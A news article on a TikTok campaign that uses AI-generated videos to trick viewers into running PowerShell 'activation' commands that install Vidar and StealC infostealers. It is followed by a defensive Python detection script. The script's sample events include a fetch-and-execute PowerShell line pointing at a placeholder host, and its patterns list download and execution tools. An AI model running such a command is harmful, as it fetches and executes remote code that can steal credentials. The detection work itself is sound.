- Trend Micro witnessed a new malware campaign on TikTok
- Videos show how to activate “premium” features in various software
- The clips were AI-generated and the victims were tricked into downloading infostealers
Hackers are posting AI-generated videos on TikTok to trick users into downloading infostealer malware, cybersecurity researchers at Trend Micro have warned.
The premise is simple: attackers use AI to generate several videos which show how to easily “activate Windows and Microsoft Office”, or to enable “premium features” in apps such as Spotify or CapCut.
They then share these videos on TikTok, whose algorithm makes it more likely that a video goes viral, which in turn makes the attack more likely to succeed.
A new spin on old tricks
In the clip, a person is shown bringing up the Run program on Windows and then executing a PowerShell command.
While the video claims that the command activates special features, in reality it downloads a malicious script, which in turn deploys the Vidar and StealC infostealers.
These infostealers can take screenshots and steal login credentials, credit card data, cookies, cryptocurrency wallet information, 2FA codes, and more.
“This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok’s algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views,” Trend Micro said.
“The videos are highly similar, with only minor differences in camera angles and the download URL used to fetch the payload,” the researchers said.
“This suggests that the videos were created through automation. The instructional voice also appears to be AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos.”
One of the videos has around 500,000 views, more than 20,000 likes, and more than 100 comments, which makes it quite successful.
Videos have been used to deliver malware in the past, but this new campaign is a significant departure from earlier methods.
The difference is that earlier, the link to the malware was shared in the video description or comments, where it could still be picked up by security solutions. By delivering the lure in video format, the attackers successfully bypass almost all security measures.
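The execution chain described above (Run dialog, then a PowerShell command that fetches a script) is visible in endpoint process-creation telemetry. The triage sketch below is an added example, not taken from Trend Micro's report; the event field names follow Sysmon Event ID 1, and the sample events, hosts and URL are constructed.

```python
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
# Commands typed into the Run dialog are spawned by explorer.exe. So are
# Start-menu launches, which is why signals are scored rather than alerted on singly.
RUN_DIALOG_PARENT = "explorer.exe"

# Tokens that fetch remote content, and tokens that execute text in memory.
FETCH = re.compile(r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression)\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

SAMPLE_EVENTS = [  # constructed process-creation events
    {"Host": "ws-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "iex (irm https://example.invalid/a.ps1)"'},
    {"Host": "ws-02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"Host": "srv-03", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    if basename(ev["Image"]) not in SHELLS:
        return 0, reasons
    cmd = ev["CommandLine"]
    url = URL.search(cmd)
    if basename(ev["ParentImage"]) == RUN_DIALOG_PARENT:
        reasons.append("PowerShell started from explorer.exe")
    if FETCH.search(cmd) and url:
        reasons.append("fetches remote content: " + url.group(0))
    if EXEC.search(cmd):
        reasons.append("executes fetched text in memory")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (host, reasons) for events with at least `threshold` signals."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["Host"], reasons))
    return hits

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```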
Via BleepingComputer